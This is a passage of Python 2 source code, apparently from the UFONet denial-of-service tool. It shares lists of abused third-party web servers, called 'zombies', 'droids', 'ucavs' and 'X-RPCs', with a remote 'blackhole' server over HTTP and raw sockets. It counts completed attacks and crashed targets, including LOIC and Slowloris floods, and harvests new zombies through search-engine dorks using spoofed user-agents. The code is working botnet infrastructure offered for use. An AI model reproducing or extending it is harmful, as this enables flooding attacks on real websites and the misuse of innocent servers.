 806. # download list of 'zombies' from server
 807. if options.download:
 808. try:
 809. self.banner()
 810. if options.dip is not None:
 811. print("\nDownloading list of 'zombies' from server "+self.blackhole+" ...\n")
 812. else:
 813. print("\nDownloading list of 'zombies' from server ...\n")
 814. print '='*22 + '\n'
 815. download_list = self.downloading_list()
 816. except Exception, e:
 817. print ("[Error] - Something wrong downloading!\n")
 818. return #sys.exit(2)
 819. # upload list of 'zombies' to a 'blackhole' IP
 820. if options.upip is not None:
 821. options.upload = True
 822. self.blackhole = options.upip
 823. # upload list of 'zombies' to server
 824. if options.upload:
 825. try:
 826. self.banner()
 827. if options.upip is not None:
 828. print("\nUploading list of 'zombies' to server "+self.blackhole+" ...\n")
 829. else:
 830. print("\nUploading list of 'zombies' to server ...\n")
 831. print '='*22 + '\n'
 832. upload_list = self.uploading_list()
 833. except Exception, e:
 834. print ("[Error] - Something wrong uploading!\n"+str(e))
 835. traceback.print_exc()
 836. return #sys.exit(2)
 837. # starting new zombie thread
 838. def connect_zombies(self, zombie):
 839. z=Zombie(self, zombie)
 840. t = threading.Thread(target=z.connect, name=zombie)
 841. t.start()
 842. # single connection handling
 843. def connect_zombie(self, zombie):
 844. z=Zombie(self,zombie)
 845. return z.connect()
 846. def extract_proxy(self, proxy):
 847. sep = ":"
 848. proxy_ip = proxy.rsplit(sep, 1)[0]
 849. if proxy_ip.startswith('http://'):
 850. proxy_ip = proxy_ip.replace('http://', '')
 851. elif proxy_ip.startswith('https://'):
 852. proxy_ip = proxy_ip.replace('https://', '')
 853. if proxy_ip == '127.0.0.1': # working by using 'localhost' as http proxy (privoxy, ...)
 854. proxy_ip = 'localhost'
 855. proxy_port = proxy.rsplit(sep, 1)[1]
 856. proxy_url = proxy_ip + ":" + proxy_port # ex: localhost:8118
 857. return proxy_url
 858. def proxy_transport(self, proxy):
 859. proxy_url = self.extract_proxy(proxy)
 860. proxy = urllib2.ProxyHandler({'https': proxy_url})
 861. opener = urllib2.build_opener(proxy)
 862. urllib2.install_opener(opener)
 863. def check_mothership_chargo(self):
 864. f = open(self.zombies_file)
 865. self.zombies = f.readlines()
 866. self.zombies = [zombie.replace('\n', '') for zombie in self.zombies]
 867. self.list_zombies = []
 868. for zombie in self.zombies:
 869. t = urlparse(zombie)
 870. name_zombie = t.netloc
 871. self.list_zombies.append(name_zombie)
 872. self.num_zombies = str(len(self.zombies))
 873. f.close()
 874. f = open(self.aliens_file)
 875. self.aliens = f.readlines()
 876. self.aliens = [alien.replace('\n', '') for alien in self.aliens]
 877. self.list_aliens = []
 878. for alien in self.aliens:
 879. t = urlparse(alien)
 880. name_alien = t.netloc
 881. self.list_aliens.append(name_alien)
 882. self.num_aliens = str(len(self.aliens))
 883. f.close()
 884. f = open(self.droids_file)
 885. self.droids = f.readlines()
 886. self.droids = [droid.replace('\n', '') for droid in self.droids]
 887. self.list_droids = []
 888. for droid in self.droids:
 889. t = urlparse(droid)
 890. name_droid = t.netloc
 891. self.list_droids.append(name_droid)
 892. self.num_droids = str(len(self.droids))
 893. f.close()
 894. f = open(self.ucavs_file)
 895. self.ucavs = f.readlines()
 896. self.ucavs = [ucav.replace('\n', '') for ucav in self.ucavs]
 897. self.list_ucavs = []
 898. for ucav in self.ucavs:
 899. t = urlparse(ucav)
 900. name_ucav = t.netloc
 901. self.list_ucavs.append(name_ucav)
 902. self.num_ucavs = str(len(self.ucavs))
 903. f.close()
 904. f = open(self.rpcs_file)
 905. self.rpcs = f.readlines()
 906. self.rpcs = [rpc.replace('\n', '') for rpc in self.rpcs]
 907. self.list_rpcs = []
 908. for rpc in self.rpcs:
 909. t = urlparse(rpc)
 910. name_rpc = t.netloc
 911. self.list_rpcs.append(name_rpc)
 912. self.num_rpcs = str(len(self.rpcs))
 913. f.close()
 914. self.total_botnet = str(int(self.num_zombies) + int(self.num_aliens) + int(self.num_droids) + int(self.num_ucavs) + int(self.num_rpcs))
 915. return self.total_botnet
 916. def update_flying_stats(self):
 917. if not os.path.exists(self.mothership_stats_file) == True: # create data when no stats file (first time used)
 918. with open(self.mothership_stats_file, "w") as f:
 919. json.dump({"flying": "0", "missions": "0", "scanner": "0", "transferred": "0", "max_chargo": "0", "completed": "0", "loic": "0", "loris": "0", "crashed": "0"}, f, indent=4) # starting reset
 920. stats_json_file = open(self.mothership_stats_file, "r")
 921. data = json.load(stats_json_file)
 922. stats_json_file.close()
 923. aflying = data["flying"]
 924. aflying = str(int(aflying) + 1) # add new flying time
 925. data["flying"] = aflying
 926. stats_json_file = open(self.mothership_stats_file, "w+")
 927. stats_json_file.write(json.dumps(data))
 928. stats_json_file.close()
 929. def update_mothership_stats(self):
 930. stats_json_file = open(self.mothership_stats_file, "r")
 931. data = json.load(stats_json_file)
 932. stats_json_file.close()
 933. acompleted = data["completed"]
 934. acompleted = str(int(acompleted) + 1) # add new completed attack
 935. data["completed"] = acompleted
 936. stats_json_file = open(self.mothership_stats_file, "w+")
 937. stats_json_file.write(json.dumps(data))
 938. stats_json_file.close()
 939. def update_targets_crashed(self):
 940. stats_json_file = open(self.mothership_stats_file, "r")
 941. data = json.load(stats_json_file)
 942. stats_json_file.close()
 943. tcrashed = data["crashed"]
 944. tcrashed = str(int(tcrashed) + 1) # add new crashed target
 945. data["crashed"] = tcrashed
 946. stats_json_file = open(self.mothership_stats_file, "w+")
 947. stats_json_file.write(json.dumps(data))
 948. stats_json_file.close()
 949. def update_missions_stats(self):
 950. stats_json_file = open(self.mothership_stats_file, "r")
 951. data = json.load(stats_json_file)
 952. stats_json_file.close()
 953. missions = data["missions"]
 954. missions = str(int(missions) + 1) # add new mission target
 955. data["missions"] = missions
 956. stats_json_file = open(self.mothership_stats_file, "w+")
 957. stats_json_file.write(json.dumps(data))
 958. stats_json_file.close()
 959. def update_scanner_stats(self, num):
 960. stats_json_file = open(self.mothership_stats_file, "r")
 961. data = json.load(stats_json_file)
 962. stats_json_file.close()
 963. scanner = data["scanner"]
 964. scanner = str(int(scanner) + int(num)) # add new zombies found by dorking to mothership stats
 965. data["scanner"] = scanner
 966. stats_json_file = open(self.mothership_stats_file, "w+")
 967. stats_json_file.write(json.dumps(data))
 968. stats_json_file.close()
 969. def update_transferred_stats(self, num):
 970. stats_json_file = open(self.mothership_stats_file, "r")
 971. data = json.load(stats_json_file)
 972. stats_json_file.close()
 973. transferred = data["transferred"]
 974. transferred = str(int(transferred) + int(num)) # add new zombies found by downloading via blackholes to mothership stats
 975. data["transferred"] = transferred
 976. stats_json_file = open(self.mothership_stats_file, "w+")
 977. stats_json_file.write(json.dumps(data))
 978. stats_json_file.close()
 979. def update_max_chargo(self, chargo):
 980. stats_json_file = open(self.mothership_stats_file, "r")
 981. data = json.load(stats_json_file)
 982. stats_json_file.close()
 983. amax_chargo = data["max_chargo"]
 984. if int(chargo) > int(amax_chargo): # new max chargo found
 985. amax_chargo = chargo # add new max chargo
 986. else:
 987. amax_chargo = data["max_chargo"]
 988. data["max_chargo"] = amax_chargo
 989. stats_json_file = open(self.mothership_stats_file, "w+")
 990. stats_json_file.write(json.dumps(data))
 991. stats_json_file.close()
 992. def update_loic_stats(self):
 993. stats_json_file = open(self.mothership_stats_file, "r")
 994. data = json.load(stats_json_file)
 995. stats_json_file.close()
 996. aloic = data["loic"]
 997. aloic = str(int(aloic) + 1) # add new loic attack
 998. data["loic"] = aloic
 999. stats_json_file = open(self.mothership_stats_file, "w+")
 1000. stats_json_file.write(json.dumps(data))
 1001. stats_json_file.close()
 1002. def update_loris_stats(self):
 1003. stats_json_file = open(self.mothership_stats_file, "r")
 1004. data = json.load(stats_json_file)
 1005. stats_json_file.close()
 1006. aloris = data["loris"]
 1007. aloris = str(int(aloris) + 1) # add new loris attack
 1008. data["loris"] = aloris
 1009. stats_json_file = open(self.mothership_stats_file, "w+")
 1010. stats_json_file.write(json.dumps(data))
 1011. stats_json_file.close()
 1012. def uploading_list(self):
 1013. import gzip
 1014. abductions = "abductions.txt.gz"
 1015. troops = "troops.txt.gz"
 1016. robots = "robots.txt.gz"
 1017. drones = "drones.txt.gz"
 1018. reflectors = "reflectors.txt.gz"
 1019. try:
 1020. print("Checking integrity of 'blackhole'...\n")
 1021. urllib.urlretrieve('http://'+self.blackhole+'/ufonet/abductions.txt.gz',
 1022. abductions)
 1023. urllib.urlretrieve('http://'+self.blackhole+'/ufonet/troops.txt.gz',
 1024. troops)
 1025. urllib.urlretrieve('http://'+self.blackhole+'/ufonet/robots.txt.gz',
 1026. robots)
 1027. urllib.urlretrieve('http://'+self.blackhole+'/ufonet/drones.txt.gz',
 1028. drones)
 1029. urllib.urlretrieve('http://'+self.blackhole+'/ufonet/reflectors.txt.gz',
 1030. reflectors)
 1031. print("Vortex: IS READY!")
 1032. f_in_abductions = gzip.open(abductions, 'rb')
 1033. f_out_abductions = open('abductions.txt', 'wb')
 1034. f_out_abductions.write(f_in_abductions.read())
 1035. f_in_abductions.close()
 1036. f_out_abductions.close()
 1037. os.remove(abductions) # remove .gz file
 1038. num_zombies = 0
 1039. with open('abductions.txt') as f:
 1040. for _ in f:
 1041. num_zombies = num_zombies + 1
 1042. print("\n[Info] - 'Zombies' on 'blackhole': "+ str(num_zombies))
 1043. f_in_robots = gzip.open(robots, 'rb')
 1044. f_out_robots = open('robots.txt', 'wb')
 1045. f_out_robots.write(f_in_robots.read())
 1046. f_in_robots.close()
 1047. f_out_robots.close()
 1048. os.remove(robots) # remove .gz file
 1049. num_robots = 0
 1050. with open('robots.txt') as f:
 1051. for _ in f:
 1052. num_robots = num_robots + 1
 1053. print("[Info] - 'Droids' on 'blackhole' : "+ str(num_robots))
 1054. f_in_troops = gzip.open(troops, 'rb')
 1055. f_out_troops = open('troops.txt', 'wb')
 1056. f_out_troops.write(f_in_troops.read())
 1057. f_in_troops.close()
 1058. f_out_troops.close()
 1059. os.remove(troops) # remove .gz file
 1060. num_aliens = 0
 1061. with open(self.aliens_file) as f:
 1062. for _ in f:
 1063. num_aliens = num_aliens + 1
 1064. print("[Info] - 'Aliens' on 'blackhole' : "+ str(num_aliens))
 1065. f_in_drones = gzip.open(drones, 'rb')
 1066. f_out_drones = open('drones.txt', 'wb')
 1067. f_out_drones.write(f_in_drones.read())
 1068. f_in_drones.close()
 1069. f_out_drones.close()
 1070. os.remove(drones) # remove .gz file
 1071. num_drones = 0
 1072. with open('drones.txt') as f:
 1073. for _ in f:
 1074. num_drones = num_drones + 1
 1075. print("[Info] - 'Drones' on 'blackhole' : "+ str(num_drones))
 1076. f_in_reflectors = gzip.open(reflectors, 'rb')
 1077. f_out_reflectors = open('reflectors.txt', 'wb')
 1078. f_out_reflectors.write(f_in_reflectors.read())
 1079. f_in_reflectors.close()
 1080. f_out_reflectors.close()
 1081. os.remove(reflectors) # remove .gz file
 1082. num_reflectors = 0
 1083. with open('reflectors.txt') as f:
 1084. for _ in f:
 1085. num_reflectors = num_reflectors + 1
 1086. print("[Info] - 'X-RPCs' on 'blackhole' : "+ str(num_reflectors))
 1087. print '-'*12 + '\n'
 1088. if not self.options.forceyes:
 1089. update_reply = raw_input("Want to merge ONLY new 'zombies' into the server? (Y/n)")
 1090. print '-'*25
 1091. else:
 1092. update_reply = "Y"
 1093. if update_reply == "n" or update_reply == "N":
 1094. os.remove('abductions.txt') # remove abductions file
 1095. os.remove('troops.txt') # remove troops file
 1096. os.remove('robots.txt') # remove robots file
 1097. os.remove('drones.txt') # remove drones file
 1098. os.remove('reflectors.txt') # remove reflectors file
 1099. print "\n[Info] - Aborting upload process and cleaning temporal files. Bye!\n"
 1100. return
 1101. else:
 1102. print "\n[Info] - Checking integrity of your list of 'zombies'. Starting test!\n" # only upload valid zombies
 1103. print '='*35
 1104. zombies = self.extract_zombies()
 1105. if not zombies:
 1106. return
 1107. test = self.testing(zombies)
 1108. zombies_community = []
 1109. zombies_added = 0
 1110. f = open('abductions.txt')
 1111. abductions = f.readlines()
 1112. abductions = [abduction.strip() for abduction in abductions]
 1113. f.close()
 1114. fz = open(self.zombies_file)
 1115. zombies = fz.readlines()
 1116. zombies = [zombie.strip() for zombie in zombies]
 1117. fz.close()
 1118. for zombie in zombies:
 1119. if zombie not in abductions:
 1120. zombies_community.append(zombie)
 1121. zombies_added = zombies_added + 1
 1122. else:
 1123. pass
 1124. print("[Info] - New 'zombies' found: " + str(zombies_added))
 1125. aliens = self.extract_aliens()
 1126. if not aliens:
 1127. return
 1128. aliens_community = []
 1129. aliens_added = 0
 1130. f = open('troops.txt')
 1131. troops = f.readlines()
 1132. troops = [troop.strip() for troop in troops]
 1133. f.close()
 1134. fz = open(self.aliens_file)
 1135. aliens = fz.readlines()
 1136. aliens = [alien.strip() for alien in aliens]
 1137. fz.close()
 1138. for alien in aliens:
 1139. if alien not in troops:
 1140. aliens_community.append(alien)
 1141. aliens_added = aliens_added + 1
 1142. else:
 1143. pass
 1144. print("[Info] - New 'aliens' found : " + str(aliens_added))
 1145. droids = self.extract_droids()
 1146. if not droids:
 1147. return
 1148. droids_community = []
 1149. droids_added = 0
 1150. f = open('robots.txt')
 1151. robots = f.readlines()
 1152. robots = [robot.strip() for robot in robots]
 1153. f.close()
 1154. fz = open(self.droids_file)
 1155. droids = fz.readlines()
 1156. droids = [droid.strip() for droid in droids]
 1157. fz.close()
 1158. for droid in droids:
 1159. if droid not in robots:
 1160. droids_community.append(droid)
 1161. droids_added = droids_added + 1
 1162. else:
 1163. pass
 1164. print("[Info] - New 'droids' found : " + str(droids_added))
 1165. ucavs = self.extract_ucavs()
 1166. if not ucavs:
 1167. return
 1168. ucavs_community = []
 1169. ucavs_added = 0
 1170. f = open('drones.txt')
 1171. drones = f.readlines()
 1172. drones = [drone.strip() for drone in drones]
 1173. f.close()
 1174. fz = open(self.ucavs_file)
 1175. ucavs = fz.readlines()
 1176. ucavs = [ucav.strip() for ucav in ucavs]
 1177. fz.close()
 1178. for ucav in ucavs:
 1179. if ucav not in drones:
 1180. ucavs_community.append(ucav)
 1181. ucavs_added = ucavs_added + 1
 1182. else:
 1183. pass
 1184. print("[Info] - New 'drones' found : " + str(ucavs_added))
 1185. rpcs = self.extract_rpcs()
 1186. if not ucavs:
 1187. return
 1188. rpcs_community = []
 1189. rpcs_added = 0
 1190. f = open('reflectors.txt')
 1191. reflectors = f.readlines()
 1192. reflectors = [reflector.strip() for reflector in reflectors]
 1193. f.close()
 1194. fz = open(self.rpcs_file)
 1195. rpcs = fz.readlines()
 1196. rpcs = [rpc.strip() for rpc in rpcs]
 1197. fz.close()
 1198. for rpc in rpcs:
 1199. if rpc not in reflectors:
 1200. rpcs_community.append(rpc)
 1201. rpcs_added = rpcs_added + 1
 1202. else:
 1203. pass
 1204. print("[Info] - New 'X-RPCs' found : " + str(rpcs_added))
 1205. print '-'*12 + '\n'
 1206. if zombies_added == 0 and aliens_added == 0 and droids_added == 0 and ucavs_added == 0 and rpcs_added == 0: # not zombies of any type
 1207. os.remove('abductions.txt') # remove abductions file
 1208. os.remove('troops.txt') # remove troops file
 1209. os.remove('robots.txt') # remove robots file
 1210. os.remove('drones.txt') # remove ucavs file
 1211. os.remove('rpcs.txt') # remove rpcs file
 1212. print("[Info] - Hehehe.. You should try to search for new 'zombies'. These are already in this 'blackhole'. ;-)\n")
 1213. return
 1214. else:
 1215. fc = gzip.open('community_zombies.txt.gz', 'wb')
 1216. for zombie in zombies_community:
 1217. fc.write(zombie.strip()+"\n")
 1218. fc.close()
 1219. os.remove('abductions.txt') # remove abductions file
 1220. fc = gzip.open('community_aliens.txt.gz', 'wb')
 1221. for alien in aliens_community:
 1222. fc.write(alien.strip()+"\n")
 1223. fc.close()
 1224. os.remove('troops.txt') # remove troops file
 1225. fc = gzip.open('community_droids.txt.gz', 'wb')
 1226. for droid in droids_community:
 1227. fc.write(droid.strip()+"\n")
 1228. fc.close()
 1229. os.remove('robots.txt') # remove robots file
 1230. fc = gzip.open('community_ucavs.txt.gz', 'wb')
 1231. for ucav in ucavs_community:
 1232. fc.write(ucav.strip()+"\n")
 1233. fc.close()
 1234. os.remove('drones.txt') # remove drones file
 1235. fc = gzip.open('community_rpcs.txt.gz', 'wb')
 1236. for rpc in rpcs_community:
 1237. fc.write(rpc.strip()+"\n")
 1238. fc.close()
 1239. os.remove('reflectors.txt') # remove reflectors file
 1240. print("[Info] - Starting to upload new 'zombies'...\n")
 1241. try: # open a socket and send data to ufonet_community reciever
 1242. host = self.blackhole
 1243. cport = 9991
 1244. mport = 9990
 1245. try:
 1246. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
 1247. cs.connect((host, cport))
 1248. cs.send("SEND " + 'community_zombies.txt.gz')
 1249. cs.close()
 1250. f = open('community_zombies.txt.gz', "rb")
 1251. data = f.read()
 1252. f.close()
 1253. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1254. ms.connect((host, mport))
 1255. ms.send(data)
 1256. ms.close()
 1257. os.remove('community_zombies.txt.gz') # remove local zombies .gz file after transfer
 1258. time.sleep(1)
 1259. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1260. cs.connect((host, cport))
 1261. cs.send("SEND " + 'community_aliens.txt.gz')
 1262. cs.close()
 1263. f = open('community_aliens.txt.gz', "rb")
 1264. data = f.read()
 1265. f.close()
 1266. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1267. ms.connect((host, mport))
 1268. ms.send(data)
 1269. ms.close()
 1270. os.remove('community_aliens.txt.gz') # remove local aliens .gz file after transfer
 1271. time.sleep(1)
 1272. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1273. cs.connect((host, cport))
 1274. cs.send("SEND " + 'community_robots.txt.gz')
 1275. cs.close()
 1276. f = open('community_droids.txt.gz', "rb")
 1277. data = f.read()
 1278. f.close()
 1279. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1280. ms.connect((host, mport))
 1281. ms.send(data)
 1282. ms.close()
 1283. os.remove('community_droids.txt.gz') # remove local droids .gz file after transfer
 1284. time.sleep(1)
 1285. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1286. cs.connect((host, cport))
 1287. cs.send("SEND " + 'community_ucavs.txt.gz')
 1288. cs.close()
 1289. f = open('community_ucavs.txt.gz', "rb")
 1290. data = f.read()
 1291. f.close()
 1292. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1293. ms.connect((host, mport))
 1294. ms.send(data)
 1295. ms.close()
 1296. os.remove('community_ucavs.txt.gz') # remove local ucavs .gz file after transfer
 1297. time.sleep(1)
 1298. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
 1299. cs.connect((host, cport))
 1300. cs.send("SEND " + 'community_rpcs.txt.gz')
 1301. cs.close()
 1302. f = open('community_rpcs.txt.gz', "rb")
 1303. data = f.read()
 1304. f.close()
 1305. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1306. ms.connect((host, mport))
 1307. ms.send(data)
 1308. ms.close()
 1309. os.remove('community_rpcs.txt.gz') # remove local rpcs .gz file after transfer
 1310. time.sleep(2) # sleep a bit more
 1311. print '-'*12 + '\n'
 1312. print("[Info] - Transfer: DONE!. Thanks for your contribution ;-)\n")
 1313. except Exception, e:
 1314. print str(e) + "\n"
 1315. except:
 1316. print '-'*12 + '\n'
 1317. print("[Error] - Connecting sockets to 'blackhole'. Aborting!\n")
 1318. return
 1319. except:
 1320. print '-'*12 + '\n'
 1321. print("[Error] - Unable to upload list of 'zombies' to this 'blackhole'. ;(\n")
 1322. return #sys.exit(2)
 1323. def downloading_list(self): # add your mirror to protect/share/distribute zombies
 1324. import urllib, gzip
 1325. abductions = "abductions.txt.gz"
 1326. troops = "troops.txt.gz"
 1327. robots = "robots.txt.gz"
 1328. drones = "drones.txt.gz"
 1329. reflectors = "reflectors.txt.gz"
 1330. try:
 1331. print("Trying 'blackhole': "+self.blackhole+"\n")
 1332. urllib.urlretrieve('http://'+self.blackhole+'/ufonet/abductions.txt.gz',
 1333. abductions)
 1334. urllib.urlretrieve('http://'+self.blackhole+'/ufonet/troops.txt.gz',
 1335. troops)
 1336. urllib.urlretrieve('http://'+self.blackhole+'/ufonet/robots.txt.gz',
 1337. robots)
 1338. urllib.urlretrieve('http://'+self.blackhole+'/ufonet/drones.txt.gz',
 1339. drones)
 1340. urllib.urlretrieve('http://'+self.blackhole+'/ufonet/reflectors.txt.gz',
 1341. reflectors)
 1342. print("Vortex: IS READY!")
 1343. except:
 1344. print("Vortex: FAILED!")
 1345. print '-'*12 + '\n'
 1346. print("[Error] - Unable to download list of 'zombies' from this 'blackhole'. ;(\n")
 1347. return #sys.exit(2)
 1348. print '-'*12 + '\n'
 1349. f_in_abductions = gzip.open(abductions, 'rb')
 1350. f_out_abductions = open('abductions.txt', 'wb')
 1351. f_out_abductions.write(f_in_abductions.read())
 1352. f_in_abductions.close()
 1353. f_out_abductions.close()
 1354. os.remove(abductions) # remove abductions .gz file
 1355. f_in_troops = gzip.open(troops, 'rb')
 1356. f_out_troops = open('troops.txt', 'wb')
 1357. f_out_troops.write(f_in_troops.read())
 1358. f_in_troops.close()
 1359. f_out_troops.close()
 1360. os.remove(troops) # remove troops .gz file
 1361. f_in_robots = gzip.open(robots, 'rb')
 1362. f_out_robots = open('robots.txt', 'wb')
 1363. f_out_robots.write(f_in_robots.read())
 1364. f_in_robots.close()
 1365. f_out_robots.close()
 1366. os.remove(robots) # remove abductions .gz file
 1367. f_in_drones = gzip.open(drones, 'rb')
 1368. f_out_drones = open('drones.txt', 'wb')
 1369. f_out_drones.write(f_in_drones.read())
 1370. f_in_drones.close()
 1371. f_out_drones.close()
 1372. os.remove(drones) # remove reflectors .gz file
 1373. f_in_reflectors = gzip.open(reflectors, 'rb')
 1374. f_out_reflectors = open('reflectors.txt', 'wb')
 1375. f_out_reflectors.write(f_in_reflectors.read())
 1376. f_in_reflectors.close()
 1377. f_out_reflectors.close()
 1378. os.remove(reflectors) # remove reflectors .gz file
 1379. num_abductions = 0
 1380. with open('abductions.txt') as f:
 1381. for _ in f:
 1382. num_abductions = num_abductions + 1
 1383. print("[Info] - Zombies: " + str(num_abductions))
 1384. num_robots = 0
 1385. with open('robots.txt') as f:
 1386. for _ in f:
 1387. num_robots = num_robots + 1
 1388. print("[Info] - Droids : " + str(num_robots))
 1389. num_troops = 0
 1390. with open('troops.txt') as f:
 1391. for _ in f:
 1392. num_troops = num_troops + 1
 1393. print("[Info] - Aliens : " + str(num_troops))
 1394. num_drones = 0
 1395. with open('drones.txt') as f:
 1396. for _ in f:
 1397. num_drones = num_drones + 1
 1398. print("[Info] - UCAVs : " + str(num_drones))
 1399. num_reflectors = 0
 1400. with open('reflectors.txt') as f:
 1401. for _ in f:
 1402. num_reflectors = num_reflectors + 1
 1403. print("[Info] - X-RPCs : " + str(num_reflectors))
 1404. total_zombies = num_abductions + num_troops + num_robots + num_drones + num_reflectors
 1405. print("\n[Info] - Congratulations!. Total downloaded: " + str(total_zombies))
 1406. print '-'*12
 1407. if not self.options.forceyes:
 1408. update_reply = raw_input("\nWant to merge ONLY new 'troops' in your army? (Y/n)")
 1409. print '-'*25
 1410. else:
 1411. update_reply = "Y"
 1412. if update_reply == "n" or update_reply == "N":
 1413. os.remove('abductions.txt') # remove abductions file
 1414. os.remove('troops.txt') # remove troops file
 1415. os.remove('robots.txt') # remove robots file
 1416. os.remove('drones.txt') # remove drones file
 1417. os.remove('reflectors.txt') # remove reflectors file
 1418. print "\n[Info] - List downloaded has been removed. Bye!\n"
 1419. else:
 1420. zombies_ready = []
 1421. f = open('abductions.txt')
 1422. abductions = f.readlines()
 1423. f.close()
 1424. fz = open(self.zombies_file)
 1425. zombies = fz.readlines()
 1426. fz.close()
 1427. for abduction in abductions:
 1428. abduction = abduction.replace('\n','')
 1429. if abduction not in zombies:
 1430. zombies_ready.append(abduction)
 1431. else:
 1432. pass
 1433. self.update_zombies(zombies_ready)
 1434. os.remove('abductions.txt') # remove abductions .txt file
 1435. aliens_ready = []
 1436. f = open('troops.txt')
 1437. troops = f.readlines()
 1438. f.close()
 1439. fz = open(self.aliens_file)
 1440. aliens = fz.readlines()
 1441. fz.close()
 1442. for alien in troops:
 1443. alien = alien.replace('\n','')
 1444. if alien not in aliens:
 1445. aliens_ready.append(alien)
 1446. else:
 1447. pass
 1448. self.update_aliens(aliens_ready)
 1449. os.remove('troops.txt') # remove troops .txt file
 1450. droids_ready = []
 1451. f = open('robots.txt')
 1452. robots = f.readlines()
 1453. f.close()
 1454. fz = open(self.droids_file)
 1455. droids = fz.readlines()
 1456. fz.close()
 1457. for droid in robots:
 1458. droid = droid.replace('\n','')
 1459. if droid not in droids:
 1460. droids_ready.append(droid)
 1461. else:
 1462. pass
 1463. self.update_droids(droids_ready)
 1464. os.remove('robots.txt') # remove robots .txt file
 1465. ucavs_ready = []
 1466. f = open('drones.txt')
 1467. drones = f.readlines()
 1468. f.close()
 1469. fz = open(self.ucavs_file)
 1470. ucavs = fz.readlines()
 1471. fz.close()
 1472. for drone in drones:
 1473. drone = drone.replace('\n','')
 1474. if drone not in ucavs:
 1475. ucavs_ready.append(drone)
 1476. else:
 1477. pass
 1478. self.update_ucavs(ucavs_ready)
 1479. os.remove('drones.txt') # remove drones .txt file
 1480. rpcs_ready = []
 1481. f = open('reflectors.txt')
 1482. reflectors = f.readlines()
 1483. f.close()
 1484. fz = open(self.rpcs_file)
 1485. rpcs = fz.readlines()
 1486. fz.close()
 1487. for reflector in reflectors:
 1488. reflector = reflector.replace('\n','')
 1489. if reflector not in rpcs:
 1490. rpcs_ready.append(reflector)
 1491. else:
 1492. pass
 1493. self.update_rpcs(rpcs_ready)
 1494. os.remove('reflectors.txt') # remove reflectors .txt file
 1495. print "\n[Info] - Botnet updated! ;-)\n"
 1496. self.update_transferred_stats(self.trans_zombies) # update json file with transferred stats (blackhole)
 1497. def create_web_interface(self):
 1498. # launch webserver+gui
 1499. from webgui import ClientThread
 1500. import webbrowser
 1501. host = '0.0.0.0'
 1502. port = 9999
 1503. try:
 1504. webbrowser.open('http://127.0.0.1:9999', new=1)
 1505. tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 1506. tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
 1507. tcpsock.bind((host,port))
 1508. while True:
 1509. tcpsock.listen(4)
 1510. #print "Listening for incoming connections on http://%s:%d" % (host,port)
 1511. (clientsock, (ip, port)) = tcpsock.accept()
 1512. newthread = ClientThread(ip, port, clientsock)
 1513. newthread.start()
 1514. except (KeyboardInterrupt, SystemExit):
 1515. sys.exit()
 1516. # def crawlering(self):
 1517. # # crawl target's links to discover web structure
 1518. # options = self.options
 1519. # myurl = options.crawl
 1520. # for i in re.findall('''href=["'](.[^"']+)["']''', urllib.urlopen(myurl).read(), re.I):
 1521. # print i
 1522. def extract_dorks(self):
 1523. # extract dorks from file (ex: 'dorks.txt')
 1524. try:
 1525. f = open(self.dorks_file)
 1526. dorks = f.readlines()
 1527. dorks = [ dork.replace('\n','') for dork in dorks ]
 1528. f.close()
 1529. if not dorks:
 1530. if not options.autosearch:
 1531. print "\n[Error] - Imposible to retrieve 'dorks' from file.\n"
 1532. return
 1533. else:
 1534. return dorks
 1535. except:
 1536. if not options.autosearch:
 1537. if os.path.exists(self.dorks_file) == True:
 1538. print '[Error] - Cannot open:', 'dorks.txt', "\n"
 1539. return #sys.exit(2)
 1540. else:
 1541. print '[Error] - Cannot found:', 'dorks.txt', "\n"
 1542. return #sys.exit(2)
 1543. else:
 1544. return
 1545. def search_zombies(self, dork, zombies_found):
 1546. # crawlering on search engine results to extract zombies
 1547. options = self.options
 1548. zombies = []
 1549. if not options.engine: # default search engine
 1550. options.engine = 'yahoo'
 1551. #if options.engine == 'duck': # using duck [09/08/2016: deprecated! -> duck has removed 'inurl' operator]
 1552. # url = 'https://duckduckgo.com/html/' # ex: POST -> path
 1553. # if options.search: # search from query
 1554. # q = 'inurl:"' + str(options.search) + '"' # set query to search literally on results [ deprecated ]
 1555. # if options.dorks: # search from a dork
 1556. # q = 'inurl:"' + str(dork) + '"' # set query from a dork to search literally on results [ deprecated ]
 1557. # data = 'q=' + q + '&b=&kl=us-en&kp=-1' # evade safe search
 1558. # self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 1559. # headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 1560. # if options.verbose:
 1561. # print("[Info] Query used: " + url + " [POST -> " + data + "]\n")
 1562. # try:
 1563. # req = urllib2.Request(url, data, headers)
 1564. # rsp = urllib2.urlopen(req)
 1565. # content = rsp.read()
 1566. # except:
 1567. # print('[Error] - Unable to connect to duck\n')
 1568. # if options.allengines:
 1569. # return
 1570. # if not options.dorks:
 1571. # if not self.options.forceyes:
 1572. # update_reply = raw_input("Want to try a different search engine? (Y/n)")
 1573. # else:
 1574. # update_reply = "Y"
 1575. # if update_reply == "n" or update_reply == "N":
 1576. # return #sys.exit(2)
 1577. # print "\nSearch engines available:"
 1578. # print '-'*25
 1579. # for e in self.search_engines:
 1580. # print "+ "+e
 1581. # print '-'*25
 1582. # print "\nEx: ufonet -s 'proxy.php?url=' --se 'duck'"
 1583. # return #sys.exit(2)
 1584. # else:
 1585. # req_reply = ''
 1586. # regex = '<a class="result__url" href="(.+?)"' # regex magics [05/08/2016]
 1587. # pattern = re.compile(regex)
 1588. # url_links = re.findall(pattern, req_reply)
 1589. if options.engine == 'bing': # using bing [04/02/2018: OK!]
 1590. url = 'https://www.bing.com/search?'
 1591. if options.search: # search from query
 1592. q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
 1593. if options.dorks or options.autosearch: # search from a dork
